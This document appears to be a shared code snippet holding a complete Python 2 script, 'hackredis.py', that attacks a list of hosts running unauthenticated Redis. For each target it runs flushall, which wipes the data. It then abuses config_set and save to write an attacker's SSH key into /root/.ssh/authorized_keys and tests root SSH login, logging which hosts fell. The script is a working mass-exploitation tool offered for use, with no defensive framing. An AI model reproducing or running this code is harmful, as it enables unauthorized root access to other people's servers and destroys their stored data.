leafsummer
3/24/2016 - 8:38 AM

hackredis

hackredis

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -----------------------------------------------------
#  FileName    :    hackredis.py
#  Date        :    2015-12-11
#  Description :    My Description
# -----------------------------------------------------

import redis
import argparse
import textwrap
import sys
import pexpect

COLOR_NONE = "\033[m"


def getargs():
    parser = argparse.ArgumentParser(prog='hackredis.py', formatter_class=argparse.RawTextHelpFormatter,
            description=textwrap.dedent('''\
            For Example:
            -------------------------------------------------
            python hackredis.py -l ip.txt -p 6379 -r foo.txt -sp 22'''))

    parser.add_argument('-l', dest='iplist', type=str, help='the hosts of target')
    parser.add_argument('-p', dest='port', default=6379, type=int, help='the redis default port')
    parser.add_argument('-r', dest='id_rsafile', type=str, help='the ssh id_rsa file you generate')
    parser.add_argument('-sp', dest='ssh_port', default=22, type=int, help='the ssh port')

    if (len(sys.argv[1:])/2 != 4):
        sys.argv.append('-h')

    return parser.parse_args()

def hackredis(host, port):
    ck = 0
    try:
        print "[*]Attacking ip:%s" % host
        r = redis.StrictRedis(host=host, port=port, db=0, socket_timeout=10)
        r.flushall()
        r.set('crackit', foo)
        r.config_set('dir', '/root/.ssh/')
        r.config_set('dbfilename', 'authorized_keys')
        r.save()
        ck = 1
    except Exception, e:
        print "\033[01;31m[-]\033[m Something wrong with %s" % host
        print e
        write(host, 2)
        ck = 0
    
    if ck == 1:
        check(host)
    else:
        pass

def check(host):
    print "\033[01;33m[*]\033[m check connecting..."
    try:
        ssh = pexpect.spawn('ssh root@%s -p %d' % (host, ssh_port))
        i = ssh.expect('[#\$]', timeout=10)
        if i == 0:
            print "\033[1;34m[+]\033[m Success !"
            write(host, 1)
        else:
            print "pass"
    except:
        print "\033[01;32m[-]\033[m Failed to connect !"
        write(host, 3)

def write(host, suc):
    if suc == 1:
        filesname = 'success.txt'
    elif suc == 2:
        filesname = 'fail.txt'
    elif suc == 3:
        filesname = 'unconnect.txt'
    else:
        pass
    file_object = open(filesname, 'a')
    file_object.write(host+'\n')
    file_object.close()


def main():
    global foo, ssh_port
    paramsargs = getargs()
    try:
        hosts = open(paramsargs.iplist, 'r')
        #print hosts
    except(IOError):
        print "Error: check your hostfile path\n"
        sys.exit(1)
    port = paramsargs.port
    ssh_port = paramsargs.ssh_port
    try:
        foo = '\n\n\n' + open(paramsargs.id_rsafile, 'r').readline() + '\n\n\n'
    except(IOError):
        print "Error: check your wordlist path\n"
        sys.exit(1)

    ips = [p.replace('\n', '') for p in hosts]
    for ip in ips:
        hackredis(ip.strip(), port)


if __name__=="__main__":
    main()